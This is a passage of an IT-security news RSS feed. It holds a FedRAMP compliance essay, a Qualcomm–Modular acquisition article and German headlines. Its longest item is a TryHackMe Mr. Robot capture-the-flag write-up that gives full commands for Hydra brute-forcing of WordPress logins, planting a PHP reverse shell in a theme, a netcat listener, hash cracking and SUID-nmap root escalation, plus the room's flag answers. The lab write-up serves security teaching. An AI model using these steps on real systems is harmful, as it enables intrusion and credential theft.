<p>Because mature organizations are not the ones pretending problems don’t exist. They’re the ones capable of identifying issues quickly, exposing them honestly and improving continuously. That’s engineering. And maybe that’s where compliance finally starts becoming useful again.</p>



<h2 class="wp-block-heading">The future of trust</h2>



<p>For organizations participating in the current pilots, many of these concepts are already being tested through automation-first assessments, machine-readable evidence and continuous visibility.  <a href="https://www.fedramp.gov/20x/phases/2">FedRAMP 20x Phase 2</a>.</p>



<p>Because right now, most compliance still works like we’re printing MapQuest directions in 2004 and hoping nothing changes between point A and point B.</p>



<p>The environment changes constantly. Cloud infrastructure drifts, engineers move quickly, businesses evolve and threat actors adapt far faster than annual audits ever could.</p>



<p>Yet most assurance still relies on frozen snapshots and sampled evidence that were already out of date the second they were exported into a PDF.</p>



<p>That’s the bit I think FedRAMP 20x genuinely understands. This isn’t just about modernising audits. It’s about acknowledging that modern systems are living systems.</p>



<p>They are transient, constantly changing and impossible to understand properly through static evidence alone.</p>



<p>That’s why the move towards APIs, telemetry and machine-readable evidence matters so much.</p>



<p>Not because APIs are trendy.</p>



<p>Because they allow us to expose operational truth continuously instead of periodically reconstructing it after the fact.</p>



<p>And honestly, I think that changes the future of trust.</p>



<p>In five years, I don’t think organizations will primarily send customers PDFs and certifications.</p>



<p>I think they’ll expose assurance layers.</p>



<p>APIs.<br>Telemetry.<br>Machine-readable evidence.</p>



<p>Instead of saying: Here’s our SOC 2.</p>



<p>They’ll say: Here’s the operational data. Query it yourself.</p>



<p>Auditors won’t disappear, but I think their role changes significantly.</p>



<p>Less time auditing screenshots and selected controls. More time validating whether the underlying evidence pipelines are complete, accurate and trustworthy.</p>



<p>Modern audit becomes less about auditing controls and more about auditing data integrity.</p>



<p>And honestly?</p>



<p>That feels like a much healthier future than the one we’ve built today.</p>



<p>Because the future of trust probably isn’t polished dashboards and carefully curated evidence. It’s operational truth, and operational truth is messy. It contains drift, exceptions, bypasses, gaps and uncomfortable findings, but that’s exactly why it’s valuable.</p>



<h2 class="wp-block-heading">Stop rewarding the best storytellers</h2>



<p>Maybe that’s the biggest shift FedRAMP 20x is trying to create. Not better paperwork. Better visibility.</p>



<p>For years, we’ve rewarded organizations for telling the cleanest story. Maybe it’s finally time we reward them for exposing the truth instead. That’s the revolution FedRAMP 20x and GRC engineering are leading.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bargeldlos zahlen: Diese neuen Funktionen erhält die Girocard alias EC-Karte - Golem.de]]></title>
<description><![CDATA[IT-Security-Awareness für Systemadministratoren: virtueller Ein-Tages-Workshop ... E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E ...]]></description>
<link>https://tsecurity.de/de/3622914/it-security-nachrichten/bargeldlos-zahlen-diese-neuen-funktionen-erhaelt-die-girocard-alias-ec-karte-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622914/it-security-nachrichten/bargeldlos-zahlen-diese-neuen-funktionen-erhaelt-die-girocard-alias-ec-karte-golemde/</guid>
<pubDate>Wed, 24 Jun 2026 23:53:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>IT</b>-<b>Security</b>-Awareness für Systemadministratoren: virtueller Ein-Tages-Workshop ... E-Learning: IT Sicherheitstests und Ethical Hacking mit Kali Linux (E ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Qualcomm’s $3.9 billion purchase of Modular aims to change the data center dynamic]]></title>
<description><![CDATA[Qualcomm on Wednesday said that it will spend $3.9 billion to purchase AI-native software platform developer Modular Inc., a move that Qualcomm says will allow it to level the playing field on data centers by creating “a silicon-agnostic compute layer.”



The stock-based acquisition “further ena...]]></description>
<link>https://tsecurity.de/de/3622741/it-security-nachrichten/qualcomms-39-billion-purchase-of-modular-aims-to-change-the-data-center-dynamic/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622741/it-security-nachrichten/qualcomms-39-billion-purchase-of-modular-aims-to-change-the-data-center-dynamic/</guid>
<pubDate>Wed, 24 Jun 2026 22:24:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Qualcomm on Wednesday said that it will spend $3.9 billion to purchase AI-native software platform developer Modular Inc., a move that Qualcomm says will allow it to level the playing field on data centers by creating “a silicon-agnostic compute layer.”</p>



<p>The <a href="https://d18rn0p25nwr6d.cloudfront.net/CIK-0000804328/70441e71-4fcb-4cdd-8874-f571622bd264.pdf" target="_blank" rel="noreferrer noopener">stock-based acquisition</a> “further enables Qualcomm Technologies to deliver a silicon-agnostic compute layer across devices, edge, and data centers, improving performance-per-watt, increasing hardware flexibility, and expanding an open developer ecosystem so customers can deploy AI more efficiently across heterogeneous platforms globally,” the company said <a href="https://investor.qualcomm.com/news-events/press-releases/news-details/2026/Qualcomm-to-Acquire-Modular/default.aspx" target="_blank" rel="noreferrer noopener">in a statement</a>. </p>



<p>Qualcomm’s position is that enterprises need far more flexibility in their data center strategies, especially given how fluid the AI space is today. When CIOs need to make bets on data centers without knowing what the field will look like in two years, it can be challenging.</p>



<p><a href="https://www.linkedin.com/in/chris-lattner-5664498a/" target="_blank" rel="noreferrer noopener">Chris Lattner</a>, CEO of Modular, posted on LinkedIn that this leveling of the data center playing field was one of the company’s key early goals.</p>



<p>“In a world with a tremendous amount of innovative heterogenous AI hardware, there has always been a gap: existing fragmented software technologies weren’t built to scale effectively across this hardware. This gap holds back innovation and choice and makes development painful,” Lattner <a href="https://www.linkedin.com/posts/chris-lattner-5664498a_im-excited-to-share-that-qualcomm-is-acquiring-share-7475540410514288640-LvCv/" target="_blank" rel="noreferrer noopener">wrote in his LinkedIn post</a>.</p>



<p>“Modular was founded 4.5 years ago to solve this problem,” he wrote. “We’ve already integrated support for several hyperscale datacenter silicon providers, but we’re not stopping with what’s publicly announced. We’ve built an open platform and are continuing to open it further.”</p>



<p>Lattner added that the Qualcomm acquisition “will accelerate our progress and path” by “spanning edge to cloud, CPU, GPU, NPU, and custom ASICs and perhaps more.”</p>



<h2 class="wp-block-heading">Addresses a pain point</h2>



<p>Analysts, although skeptical of the probability of success in taking meaningful market share away from Nvidia, said that Qualcomm has focused on a true sore point for enterprises struggling with data center approaches. </p>



<p><a href="https://moorinsightsstrategy.com/team/matt-kimball/" target="_blank" rel="noreferrer noopener">Matt Kimball</a>, VP and principal analyst with Moor Insights &amp; Strategy, said, “the argument that Modular can make datacenters cost-effective is directionally correct. As enterprise AI actually hits velocity, heterogeneity is almost an understatement. Different accelerators are required for different use cases across different deployment scenarios.”</p>



<p>To date, it’s been a challenge for organizations to manage AI in this environment, he noted. “And when enterprise AI takes off, this challenge will be fully exposed.”</p>



<p>Kimball said that Modular “can be extremely valuable in achieving two things that will vex most organizations: abstracting complexity and delivering significantly more flexibility. And this would certainly lead to TCO advantages. I think the per-watt performance claim can be challenging to validate across every and any deployment scenario, but I understand the spirit behind it.”</p>



<p><a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, also applauded the Qualcomm move, but he stressed that the deal’s value is not in the technology as much as in the talent.</p>



<p>“The key is what Qualcomm actually bought: not silicon, but the software layer, meaning Chris Lattner’s team plus Mojo and the MAX engine. That’s the right place to apply pressure. Nvidia’s real moat has never been the GPUs,” he said. “It’s CUDA and the rewrite cost that keeps workloads pinned to their hardware. A credible ‘write once, run across CPU/GPU/NPU/ASIC without rewrites’ layer is exactly what lowers the switching cost and makes non-Nvidia silicon a safer bet.”</p>



<p>But Goryunov said that the data center “democratization” argument also is powerful.</p>



<p>“Anything that pushes toward democratization of compute and better routing of tasks to best-fit capacity adds real flexibility to the ecosystem,” he noted. “If workloads can be matched to the right compute instead of defaulting to one vendor, everyone gets more efficiency on performance-per-watt and TCO and customers get real choice. That’s the part of this I find most compelling.”</p>



<h2 class="wp-block-heading">Still some obstacles</h2>



<p>That said, none of this will be easy, he pointed out.</p>



<p>“Does it change the competitive position versus Nvidia? Directionally, yes. It opens a credible second front at the exact point where Nvidia is stickiest. I’d stop short of saying it shifts the balance overnight. CUDA’s moat is a decade deep and this is a multi-year execution play,” Goryunov said. “But the attack is aimed at the right wall and the team they bought is about as serious as it gets for this fight.”</p>



<p>But he stressed that much of Qualcomm’s strategy with this acquisition relies on an uncertain assumption: That Nvidia won’t counterattack by opening its architectures to various others. Or, at the very least, that Nvidia won’t do so quickly enough.</p>



<p>“That’s the barrier to entry, which is that Nvidia will focus on their stickiness,” Goryunov said.</p>



<p>Kimball added that, from a competitive perspective, Qualcomm has various obstacles to overcome. “Part of this acquisition goes directly to the Nvidia challenge” of finding a way to “make it easier for customers to deploy heterogeneous silicon without software getting in the way.”</p>



<p><a href="https://www.infotech.com/profiles/john-annand" target="_blank" rel="noreferrer noopener">John Annand</a>, senior technical counselor at Info-Tech Research Group, is more skeptical of Qualcomm’s ability to do serious damage to Nvidia.</p>



<p>“Nvidia has something like 85% of the AI accelerator chip market,” he pointed out. “Sure, they have nowhere to go but down, but that’s still going to take them a while. More importantly, they have literally spent decades working with practitioners in AI and ML and compute-intensive fields, indoctrinating them into their CUDA software ecosystem. Rewriting that tool chain will take institutional change at most organizations, which means years, if not decades, to uncouple.”</p>



<p>“Organizations that think they’ve achieved agnosticism because they’re using high-level abstractions like PyTorch, well,  they have come closest,” he observed. “But just cutting and pasting the same code into AMD Instinct can lead to memory and dependency errors. It’s like VM lift and shifts to the public cloud 10 years ago. Easier, but still possible to screw up.”</p>



<p>Nonetheless, Annand said that the deal, if it goes through, is still good news for enterprises. </p>



<p>“What it means for enterprise IT is that the vendors we currently rely on to deliver AI have another potential building block. Because enterprise IT accesses AI via an API call, it’s operationally irrelevant to us if Claude runs on Nvidia, AMD ROCm, or Modular,” he said. </p>



<p>“Now, because of the commercial and stock agreements, OpenAI and Anthropic aren’t going to jump ship anytime soon. But if your enterprise is looking for more boutique offerings, like those from Cohere, or is looking to build its own models and tools from scratch, this is an exciting announcement.”</p>



<h2 class="wp-block-heading">Goal: build once, run anywhere</h2>



<p><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, looks at the potential acquisition, while it will potentially deliver benefits, as suffering from many practical roadblocks.  </p>



<p>“Qualcomm is chasing what you might call model democracy,” he said, noting that today, AI deployment teams are locked to whatever accelerator they trained on, and moving a model to different hardware means re-engineering, not just configuration changes.</p>



<p>“Modular’s pitch is that this goes away: build once, run across CPU, GPU, NPU, whatever the infrastructure calls for,” Bellamkonda said. “That’s a credible goal. The catch is that democracy and portability aren’t the same thing. Qualcomm will tune hardest for Qualcomm silicon. Every hardware company does. Vendor-neutral software foundations have a habit of developing hardware preferences once their acquirers need to differentiate silicon.”</p>



<p><a href="https://www.linkedin.com/in/fvillanustre/" target="_blank" rel="noreferrer noopener">Flavio Villanustre</a>, CISO for the LexisNexis Risk Solutions Group, provided a different perspective. </p>



<p>“I think it’s important to clarify that Modular is behind the Mojo programming language, which provides an abstraction layer for AI models, enabling them to run across different hardware architectures,” he said. “In the traditional approach, if you code an AI stack on Python or C and target a particular hardware architecture, such as X86, Nvidia GPU, AMD GPU, or TPU, you will need to rewrite a significant portion of that to run it on a different architecture. With Mojo, you code it once and it runs everywhere, even on hybrid systems composed of different hardware architectures.”</p>



<p>And, he said, “if you now consider the fact that Qualcomm owns intellectual property and manufacturing across different hardware architectures, both CPU and GPU, this acquisition could offer their customers significant lift. I see this as Qualcomm buying abstraction that allows them to provide diverse hardware offerings and still offer their customers full code reuse across their entire CPU/GPU/TPU/NPU portfolio.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyberangriff auf Klue: Hacker erbeutet Daten von Lastpass-Nutzern - Golem.de]]></title>
<description><![CDATA[Seminar: Microsoft 365 Copilot Administration: virtueller Ein-Tages-Workshop · zum Kurs. IT Sicherheitstests und Ethical Hacking mit Kali Linux (E- ...]]></description>
<link>https://tsecurity.de/de/3622624/hacking/cyberangriff-auf-klue-hacker-erbeutet-daten-von-lastpass-nutzern-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622624/hacking/cyberangriff-auf-klue-hacker-erbeutet-daten-von-lastpass-nutzern-golemde/</guid>
<pubDate>Wed, 24 Jun 2026 21:22:55 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seminar: Microsoft 365 Copilot Administration: virtueller Ein-Tages-Workshop · zum Kurs. IT Sicherheitstests und Ethical <b>Hacking</b> mit Kali Linux (E- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyberangriff auf Klue: Hacker erbeutet Daten von Lastpass-Nutzern - Golem.de]]></title>
<description><![CDATA[IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ... VerschlüsselungCloud-DiensteSoftwareUnternehmenssoftwareSecurityCybercrime ...]]></description>
<link>https://tsecurity.de/de/3622194/it-security-nachrichten/cyberangriff-auf-klue-hacker-erbeutet-daten-von-lastpass-nutzern-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622194/it-security-nachrichten/cyberangriff-auf-klue-hacker-erbeutet-daten-von-lastpass-nutzern-golemde/</guid>
<pubDate>Wed, 24 Jun 2026 18:53:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ... VerschlüsselungCloud-DiensteSoftwareUnternehmenssoftware<b>Security</b>Cybercrime ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicherheitslücke: Millionen von Samsung-Smartphones durch Kernel-Bug gefährdet]]></title>
<description><![CDATA[Wie Cyber Security News (öffnet im neuen Fenster) unter Verweis auf ... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ...]]></description>
<link>https://tsecurity.de/de/3622020/it-security-nachrichten/sicherheitsluecke-millionen-von-samsung-smartphones-durch-kernel-bug-gefaehrdet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622020/it-security-nachrichten/sicherheitsluecke-millionen-von-samsung-smartphones-durch-kernel-bug-gefaehrdet/</guid>
<pubDate>Wed, 24 Jun 2026 17:52:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wie <b>Cyber Security</b> News (öffnet im neuen Fenster) unter Verweis auf ... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ...]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Mr. Robot CTF | Full Write-Up]]></title>
<description><![CDATA[Platform: TryHackMeRoom: Mr. Robot CTFDifficulty: MediumAuthor: Shikhali Jamalzade (@alisalive)Date: May 2026Tags: #CTF #TryHackMe #WordPress #PrivilegeEscalation #PenTest #MrRobot“Give a man a gun and he can rob a bank. Give a man a bank and he can rob the world.” — Mr. RobotIntroductionThe Mr. ...]]></description>
<link>https://tsecurity.de/de/3621795/hacking/tryhackme-mr-robot-ctf-full-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621795/hacking/tryhackme-mr-robot-ctf-full-write-up/</guid>
<pubDate>Wed, 24 Jun 2026 16:55:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oEKhllKIF6aLRt62C2KnOQ.png"></figure><h4><strong>Platform:</strong> <a href="https://tryhackme.com/p/alisalive.exe">TryHackMe</a><br><strong>Room:</strong> <a href="https://tryhackme.com/room/mrrobot">Mr. Robot CTF</a><br><strong>Difficulty:</strong> Medium<br><strong>Author:</strong> Shikhali Jamalzade (<a href="https://github.com/alisalive">@alisalive</a>)<br><strong>Date:</strong> May 2026<br><strong>Tags:</strong> #CTF #TryHackMe #WordPress #PrivilegeEscalation #PenTest #MrRobot</h4><p><em>“Give a man a gun and he can rob a bank. Give a man a bank and he can rob the world.”</em> — Mr. Robot</p><h3>Introduction</h3><p>The <strong>Mr. Robot CTF</strong> room on TryHackMe is inspired by the cult TV series of the same name — a show about hacking, manipulation, and power. Created by security researcher <strong>Leon Johnson</strong>, the room presents a realistic attack surface: a WordPress-powered web server with deliberately weak credentials and a classic privilege escalation vector involving a SUID binary.</p><p>Your mission: find <strong>3 hidden keys</strong> on the machine.</p><p>In this write-up, I’ll walk through every step of the compromise — from initial reconnaissance all the way to root. I’ll explain the <em>why</em> behind each tool and technique, not just the <em>how</em>.</p><h3>Environment Setup</h3><p>Before anything, connect to the TryHackMe VPN:</p><p>bash</p><pre>sudo openvpn your-config.ovpn</pre><p>Once connected, deploy the Mr. Robot machine from the room page. Note the assigned IP (referred to as &lt;TARGET_IP&gt; throughout this write-up).</p><h3>Phase 1 — Reconnaissance</h3><h3>Nmap Port Scan</h3><p>Every engagement begins with understanding the attack surface. We’ll use <strong>nmap</strong> to identify open ports, services, and versions.</p><p>bash</p><pre>nmap -sC -sV -T4 -oN nmap_scan.txt &lt;TARGET_IP&gt;</pre><p><strong>Flag breakdown:</strong></p><ul><li>-sC — Run default NSE scripts (useful for detecting common vulns and misconfigs)</li><li>-sV — Probe service versions</li><li>-T4 — Aggressive timing (faster on stable networks)</li><li>-oN — Save output to file for reference</li></ul><p><strong>Results:</strong></p><pre>PORT    STATE  SERVICE  VERSION<br>80/tcp  open   http     Apache httpd<br>443/tcp open   ssl/http Apache httpd<br>22/tcp  closed ssh</pre><p>Two web servers (HTTP + HTTPS) are running on a standard Apache stack. SSH is closed, so our initial foothold will be through the web.</p><h3>Phase 2 — Web Enumeration</h3><h3>Visiting the Website</h3><p>Navigate to http://&lt;TARGET_IP&gt; in your browser. You'll be greeted by an interactive terminal simulation themed around the Mr. Robot show. It's visually impressive but doesn't contain anything useful for exploitation — feel free to play around though.</p><h3>robots.txt — The First Lead</h3><p>A robots.txt file tells web crawlers which paths to avoid. It's frequently overlooked by developers, but for pentesters it's a goldmine.</p><p>bash</p><pre>curl http://&lt;TARGET_IP&gt;/robots.txt</pre><p><strong>Output:</strong></p><pre>User-agent: *<br>fsocity.dic<br>key-1-of-3.txt</pre><p>Two files are disclosed:</p><ul><li>fsocity.dic — a wordlist (we'll use this to brute-force WordPress)</li><li>key-1-of-3.txt — the first flag</li></ul><p>Download both immediately:</p><p>bash</p><pre>wget http://&lt;TARGET_IP&gt;/fsocity.dic<br>wget http://&lt;TARGET_IP&gt;/key-1-of-3.txt<br>cat key-1-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 1:</em></strong><em> </em><em>073403c8a58a1f80d943455fb30724b9</em></blockquote><h3>Directory Brute-Forcing with Gobuster</h3><p>To map the full attack surface, we enumerate hidden directories:</p><p>bash</p><pre>gobuster dir -u http://&lt;TARGET_IP&gt; -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50</pre><p>Key findings:</p><pre>/wp-login    (Status: 200)<br>/wp-admin    (Status: 301)<br>/robots      (Status: 200)<br>/readme      (Status: 200)<br>/sitemap     (Status: 200)<br>/wp-content  (Status: 301)</pre><p>The presence of /wp-login confirms this is a <strong>WordPress</strong> installation. This opens up a well-documented attack path.</p><h3>Phase 3 — WordPress Credential Brute-Force</h3><h3>Preparing the Wordlist</h3><p>The fsocity.dic file contains <strong>858,160 words</strong> — most of them duplicates. Running a brute-force with this as-is would waste significant time. We deduplicate it first:</p><p>bash</p><pre>wc -w fsocity.dic         # 858160 words<br>sort fsocity.dic | uniq &gt; fs-clean.txt<br>wc -w fs-clean.txt        # 11451 words — a 98.7% reduction</pre><p>Always optimize your wordlists before launching attacks. Speed matters in real engagements.</p><h3>Username Enumeration with Hydra</h3><p>WordPress gives different error messages depending on whether a username exists:</p><ul><li>Invalid username → ERROR: Invalid username.</li><li>Valid username, wrong password → ERROR: The password you entered for the username … is incorrect.</li></ul><p>We exploit this <strong>username enumeration</strong> vulnerability to find valid users first, then pivot to password brute-forcing.</p><p>Start by capturing a failed login request with <strong>Burp Suite</strong> to identify the POST parameters (log and pwd). Then launch Hydra:</p><p>bash</p><pre>hydra -L fs-clean.txt -p test &lt;TARGET_IP&gt; http-post-form \<br>  "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=Invalid username" -t 30</pre><ul><li>-L fs-clean.txt — username wordlist</li><li>-p test — static placeholder password (we only care about username validity here)</li><li>F=Invalid username — string that indicates a failed attempt (Hydra ignores these)</li></ul><p><strong>Result:</strong> Valid username found → elliot</p><h3>Password Brute-Force</h3><p>Now that we have a valid username, we brute-force the password using the same deduplicated list:</p><p>bash</p><pre>hydra -l elliot -P fs-clean.txt &lt;TARGET_IP&gt; http-post-form \<br>  "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=The password you entered for the username" -t 30</pre><p><strong>Result:</strong> Password found → ER28-0652</p><p><strong>Alternative — WPScan:</strong></p><p>bash</p><pre>wpscan --url http://&lt;TARGET_IP&gt; -U elliot -P fs-clean.txt -t 50</pre><p>WPScan is purpose-built for WordPress and tends to be faster for this specific task.</p><h3>Phase 4 — WordPress Remote Code Execution</h3><h3>Gaining Admin Access</h3><p>Navigate to http://&lt;TARGET_IP&gt;/wp-login.php and log in with:</p><ul><li><strong>Username:</strong> elliot</li><li><strong>Password:</strong> ER28-0652</li></ul><p>Elliot has full administrator privileges. Welcome to the dashboard.</p><h3>Uploading a PHP Reverse Shell</h3><p>WordPress administrators can edit theme template files — raw PHP. This is our injection point.</p><p>Navigate to: <strong>Appearance → Theme Editor → Select a template (e.g., </strong><strong>archive.php or </strong><strong>404.php)</strong></p><p>Replace the entire file content with <strong>PentestMonkey’s PHP reverse shell</strong>:</p><pre>https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php</pre><p>Before saving, edit these two lines to match your attacking machine:</p><p>php</p><pre>$ip = '&lt;YOUR_ATTACKING_IP&gt;';   // your TryHackMe VPN IP (tun0)<br>$port = 4444;                   // or any port you choose</pre><p>Click <strong>Update File</strong>.</p><h3>Setting Up the Listener</h3><p>On your attacking machine:</p><p>bash</p><pre>nc -lvnp 4444</pre><h3>Triggering the Shell</h3><p>Now visit the modified template URL in your browser. For the archive.php template, it would be:</p><pre>http://&lt;TARGET_IP&gt;/wp-content/themes/twentyfifteen/archive.php</pre><p>Check your terminal — you should have a reverse shell as daemon:</p><p>bash</p><pre>$ whoami<br>daemon</pre><h3>Phase 5 — Post-Exploitation &amp; Key 2</h3><h3>Exploring the Filesystem</h3><p>Navigate to the home directory:</p><p>bash</p><pre>cd /home/robot<br>ls -la</pre><p><strong>Output:</strong></p><pre>-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt<br>-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5</pre><p>We can see key-2-of-3.txt, but it's only readable by the robot user. However, password.raw-md5 is world-readable:</p><p>bash</p><pre>cat password.raw-md5</pre><p><strong>Output:</strong></p><pre>robot:c3fcd3d76192e4007dfb496cca67e13b</pre><h3>Cracking the MD5 Hash</h3><p>The hash format is MD5 (hinted by the filename). Crack it using:</p><p><strong>Option 1 — CrackStation (online):</strong> Paste the hash at <a href="https://crackstation.net/">crackstation.net</a></p><p><strong>Option 2 — John the Ripper:</strong></p><p>bash</p><pre>echo "c3fcd3d76192e4007dfb496cca67e13b" &gt; hash.txt<br>john hash.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt</pre><p><strong>Option 3 — Hashcat:</strong></p><p>bash</p><pre>hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt</pre><p><strong>Result:</strong> abcdefghijklmnopqrstuvwxyz</p><h3>Spawning a Proper TTY Shell</h3><p>Before switching users, we need a fully interactive terminal. Our current shell is a limited “dumb” shell that doesn’t support su. Fix it with Python's pty module:</p><p>bash</p><pre>python -c 'import pty; pty.spawn("/bin/bash")'</pre><p>Now switch to the robot user:</p><p>bash</p><pre>su robot<br># Password: abcdefghijklmnopqrstuvwxyz</pre><p>Read the second key:</p><p>bash</p><pre>cat /home/robot/key-2-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 2:</em></strong><em> </em><em>822c73956184f694993bebb3eb32f0bf</em></blockquote><h3>Phase 6 — Privilege Escalation to Root</h3><p>With robot, we still can't read the third key (located in /root). We need to escalate to root.</p><h3>Finding SUID Binaries</h3><p>SUID (Set User ID) binaries run with the permissions of their <strong>owner</strong> (often root), regardless of who executes them. This is a common and powerful escalation vector.</p><p>bash</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Scan the results. Something unusual stands out:</p><pre>/usr/local/bin/nmap</pre><p><strong>Nmap with SUID?</strong> That’s misconfigured. Older versions of nmap (2.02–5.21) include an --interactive mode that allows shell command execution.</p><h3>GTFOBins — nmap Interactive Mode</h3><p>Verify on <a href="https://gtfobins.github.io/gtfobins/nmap/">GTFOBins</a>:</p><p>bash</p><pre>nmap --interactive</pre><p>Once in nmap’s interactive prompt:</p><pre>nmap&gt; !sh</pre><p>Check your privilege level:</p><p>bash</p><pre>whoami<br># root</pre><p>You now have a root shell.</p><h3>Capturing the Final Key</h3><p>bash</p><pre>cat /root/key-3-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 3:</em></strong><em> </em><em>04787ddef27c3dee1ee161b21670b4e4</em></blockquote><h3>Attack Chain Summary</h3><pre>robots.txt disclosure<br>        ↓<br>Key 1 found (public file)<br>        ↓<br>WordPress discovered via gobuster<br>        ↓<br>Username enumerated via error message difference<br>        ↓<br>Password cracked via Hydra + fsocity.dic wordlist<br>        ↓<br>Admin access → PHP reverse shell injected into theme<br>        ↓<br>Shell as daemon → /home/robot/ explored<br>        ↓<br>MD5 hash cracked → su robot → Key 2<br>        ↓<br>SUID nmap found → nmap --interactive → !sh → root<br>        ↓<br>Key 3 captured</pre><h3>Lessons Learned</h3><p><strong>1. robots.txt is not security.</strong> It’s a disclosure mechanism by design — never put sensitive file paths there.</p><p><strong>2. WordPress login pages expose usernames.</strong> The different error messages for “invalid username” vs “wrong password” enable user enumeration. This is a long-standing WordPress issue.</p><p><strong>3. Wordlist hygiene matters.</strong> Deduplicating fsocity.dic reduced it from 858,160 to 11,451 entries — making the brute-force ~75x faster. Never throw raw wordlists at targets.</p><p><strong>4. Theme editors are code execution.</strong> Any CMS that lets admins write raw PHP to disk is one compromised account away from full RCE.</p><p><strong>5. SUID misconfigurations are everywhere.</strong> Always run find / -perm -u=s -type f 2&gt;/dev/null on post-exploitation. Cross-reference with GTFOBins.</p><p><strong>6. MD5 is not encryption.</strong> It’s a hashing algorithm, and short/predictable passwords will fall to rainbow tables instantly. Use bcrypt, Argon2, or scrypt for password storage.</p><h3>Tools Used</h3><p>Tool Purpose nmap Port scanning &amp; service enumeration gobuster Directory brute-forcing Burp Suite HTTP request interception &amp; analysis Hydra Credential brute-forcing WPScan WordPress-specific enumeration Pentest Monkey PHP Reverse Shell Remote code execution payload Netcat Reverse shell listener John the Ripper / Hashcat Hash cracking GTFOBins SUID exploitation reference</p><h3>Flags</h3><p>1073403c8a58a1f80d943455fb30724b9<br>2822c73956184f694993bebb3eb32f0bf<br>304787ddef27c3dee1ee161b21670b4e4</p><p><em>Thanks for reading. If you have questions or spotted a better path, drop a comment — I’m always up for discussing alternative techniques.</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.<br></em>and my <a href="https://tryhackme.com/p/alisalive.exe"><em>TryHackMe</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=f28d83777dde" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-mr-robot-ctf-full-write-up-f28d83777dde">TryHackMe — Mr. Robot CTF | Full Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[All challenges big and small]]></title>
<description><![CDATA[When I was 18, I skipped my high school graduation and headed to Kuwait. It was 1991, the first Gulf War had just ended, and the country was in complete chaos. There was little to no electricity, aside from generator power. Rubble and unexploded ordnance were everywhere. Massive oil fires lit up ...]]></description>
<link>https://tsecurity.de/de/3620807/ai-nachrichten/all-challenges-big-and-small/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620807/ai-nachrichten/all-challenges-big-and-small/</guid>
<pubDate>Wed, 24 Jun 2026 11:34:07 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[When I was 18, I skipped my high school graduation and headed to Kuwait. It was 1991, the first Gulf War had just ended, and the country was in complete chaos. There was little to no electricity, aside from generator power. Rubble and unexploded ordnance were everywhere. Massive oil fires lit up the desert and…]]></content:encoded>
</item>
<item>
<title><![CDATA[Valve: Die Steam Machine muss kein Bestseller werden - Golem.de]]></title>
